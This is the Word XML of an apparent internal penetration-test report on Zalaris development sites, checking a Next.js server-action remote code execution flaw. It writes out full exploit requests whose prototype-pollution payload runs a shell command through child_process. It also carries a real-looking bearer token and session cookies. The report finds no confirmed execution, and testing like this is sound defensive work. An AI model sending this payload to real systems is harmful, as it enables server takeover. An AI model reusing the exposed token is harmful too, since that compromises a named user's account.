        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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GET : helpdesk-dev.zalaris.com : 443 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE9F1C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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POST : helpdesk-dev.zalaris.com : 3000 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1167FC3D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:suppressLineNumbers w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="720" w:leftChars="0" w:hanging="36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GET : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">helpdesk-dev.zalaris.com : 3000 :  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/api/v1/tickets/551942/entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC074FD">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ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E02EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Access helpdesk-dev.zalaris.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F28BBC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Click on Submit a ticket tile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F1A6BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Upload a file using file attachment menu and capture the request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2090D3AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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This request has multipart/form-data available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10673873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Alter the content with the payload provided for remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9B3514">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603E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shd w:val="clear" w:color="auto" w:fill="CFCECE" w:themeFill="background2" w:themeFillShade="E5"/>
          </w:tcPr>
          <w:p w14:paraId="34E352A1">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POST / HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="690EF267">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Host: helpdesk-dev.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645A4F92">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Cookie: ai_user=HENjy26NXpitQZ20ySBXmh|2025-11-21T06:03:24.335Z; ai_session=+fwa/rLJKQC5X5BJDO5x1c|1765362788768|1765363008689</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73DDDBA4">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Content-Length: 759</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7181B1">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Sec-Ch-Ua-Platform: "Windows"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55F696CB">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Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Imd1eU9COWhFMEhMLWJ5UERDaUZKckotRUY1QXRDN2g4VmVtRURkXzA3TEEiLCJ0eXAiOiJKV1QifQ.eyJhdWQiOiIwMDJiNTI4My1mZGY0LTQwYzEtYWVhYS04Yzg3ZGE1MWMwYWIiLCJpc3MiOiJodHRwczovL2FsdW1uaWRldi5iMmNsb2dpbi5jb20vdGZwLzc3ZDA3ZTQ1LWYxN2EtNDgxZi1iZTgyLWUzMzc1NDA4M2YxMi9iMmNfMWFfc2lnbnVwX3NpZ25pbi92Mi4wLyIsImV4cCI6MTc2NTM2NjQxNSwibmJmIjoxNzY1MzYyODE1LCJleHRlbnNpb25fWmFsYXJpc0lEIjoiNTEwLTA0MDAwMTE2IiwibmFtZSI6IlMsIE1vaGFtbWVkIFNoYXJveiIsImdpdmVuX25hbWUiOiJNb2hhbW1lZCBTaGFyb3oiLCJmYW1pbHlfbmFtZSI6IlMiLCJlbWFpbCI6Ik1PSEFNTUVELlNIQVJPWkBaQUxBUklT………………</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D5ED9D3">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Accept-Language: en-US,en;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="152C0EF2">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Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A3E227B">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Sec-Ch-Ua-Mobile: ?0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD9FE1B">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Request-Id: |511319140dca41a0a49267924c8408d9.b2dd3735ffdd4e6e</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A043718">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Traceparent: 00-511319140dca41a0a49267924c8408d9-b2dd3735ffdd4e6e-01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E90B6C5">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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF766E9">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>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Next-Action: x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2567BBDD">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X-Nextjs-Request-Id: b5dce965</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="369085E8">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Accept: application/json, text/plain, */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148BD5E9">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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C96486A">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X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27AE436D">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Origin: https://helpdesk-dev.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C5B596D">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Sec-Fetch-Site: same-origin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4248D159">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Sec-Fetch-Mode: cors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B2E60AD">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Sec-Fetch-Dest: empty</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56AC11EA">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Referer: https://helpdesk-dev.zalaris.com/510/tickets/551942?reload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4926C2AB">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Accept-Encoding: gzip, deflate, br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3AD601">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Priority: u=1, i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42FFA23F">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7F944496">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p w14:paraId="0C890DE0">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Content-Disposition: form-data; name="0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA3E78C">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115C8F7D">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p w14:paraId="01DD56FB">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"then": "$1:__proto__:then",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22571B08">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"status": "resolved_model",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B111C8C">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"reason": -1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23054F4C">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"value": "{\"then\":\"$B1337\"}",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3110137A">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"_response": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CD5369">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"_prefix": "var res=process.mainModule.require('child_process')</w:t>
            </w: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.execSync('id',</w:t>
            </w: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{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40BA25CE">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"_chunks": "$Q2",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B483912">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"_formData": {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C38C89A">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"get": "$1:constructor:constructor"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C247465">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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70C01FE5">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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71BC07FF">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p w14:paraId="77E479B4">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p w14:paraId="6566F9FC">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Content-Disposition: form-data; name="1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F83837F">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3B876FE2">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"$@0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68481461">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p w14:paraId="477B41B6">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Content-Disposition: form-data; name="2"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="529160B0">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37D7159A">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p w14:paraId="29B6EE87">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p w14:paraId="7D4C5F98">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>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443CE9A2">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vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EA31893">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4CC22C9D">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server responded with 405 Method Not allowed for authenticated and unauthenticated attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CE9AE1">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835A98F">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Refer screenshot attached for evidence </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093FBDB">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ED6045B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="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Request </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E05544">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D43561D">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643370" cy="5520690"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1143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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6643370" cy="5520690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D563850">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19A32067">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Response </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F5833">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3182D9C3">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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6642100" cy="6761480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6642100" cy="6761480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="72973643">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527DE265">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42698C30">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Unauthenticated attack [request without authorization Bearer Token] gives the same response , 405 Method Not Allowed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAEEB9">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09BBDE5">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6642100" cy="6761480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="50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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6642100" cy="6761480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="76799A3A"/>
    <w:p w14:paraId="1E7F1A4E">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Test against Alumni-Dev.zalaris.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF98E14">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A212C36">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following HTTP Method : host : port : path combinations were tested and no issues were found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644F5359">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GET : localhost : 3000 :/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pi/content/news?countryCode=NO&amp;clientId=510</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00482C78">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POST : localhost :3000 : GET : localhost : 3000 :/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pi/content/news?countryCode=NO&amp;clientId=510</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8A432">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POST : alumni-dev.zalaris.com : 443 : :/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pi/content/news?countryCode=NO&amp;clientId=510</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6502C155">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>POST : alumni-dev.zalaris.com : 3000 :/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pi/content/news?countryCode=NO&amp;clientId=510</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52396C">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GET : alumni-dev.zalaris.com : 443 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161832FB">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POST : alumni-dev.zalaris.com : 3000 : /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0E2AD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1BFAA0">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No Sever response that confirms Remote Code Execution is received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B057115">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723359E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB0EFBA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238D3F4C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C9D846">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304F5837">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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Access alumni-dev.zalaris.com </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35993E78">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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Create a request without authentication , with the multipart/form-data payload and forward it </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65412B2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>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Payload is attached below </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383F558A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>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1DDC4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shd w:val="clear" w:color="auto" w:fill="CFCECE" w:themeFill="background2" w:themeFillShade="E5"/>
          </w:tcPr>
          <w:p w14:paraId="67721470">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PUT /api/employees/510-00000506 HTTP/2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0044FACF">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Host: alumni-dev.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C3017F">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Cookie: ai_user=IaWLNy5bzqRq0JEYTGOhB/|2025-12-10T11:04:58.985Z; ai_session=0yQRm80Fc5UdVY7QxC6ndo|1765364699247|1765364861408</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B25C5F9">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Content-Length: 740</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4374CA93">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Sec-Ch-Ua-Platform: "Windows"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="305DD19A">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Accept-Language: en-US,en;q=0.9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F80D71F">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Referrer: ZALCSOCIA1012-2025</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E584FE0">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Sec-Ch-Ua: "Chromium";v="143", "Not A(Brand";v="24"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="142FBDB5">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Sec-Ch-Ua-Mobile: ?0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02461B6B">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Request-Id: |04cd26d50555423bb052b67100fbe463.348d8d7158f74a64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CEE8179">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Traceparent: 00-04cd26d50555423bb052b67100fbe463-348d8d7158f74a64-01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB6872D">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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FDEA161">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:shd w:val="clear"/>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Next-Action: x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67275D9D">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>X-Nextjs-Request-Id: b5dce965</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A5BCCC">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Content-Type:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> multipart/form-data</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>; boundary=----WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BE32D70">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:highlight w:val="yellow"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="446F08E4">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Origin: https://helpdesk-dev.zalaris.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40DE98B5">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Sec-Fetch-Site: same-origin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A47FC18">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Sec-Fetch-Mode: cors</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A4CE07">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Sec-Fetch-Dest: empty</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C89CA22">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Referer: https://helpdesk-dev.zalaris.com/510/tickets/551942?reload</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C6AEFB3">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Accept-Encoding: gzip, deflate, br</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61647695">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Priority: u=1, i</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0F82E7">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Content-Length: 740</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A845FB">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:vertAlign w:val="baseline"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C042CD0">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------WebKitFormBoundaryGHltqB2YXcxu8kyN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02CE20AD">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Content-Disposition: form-data; name="0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="791CFBE4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
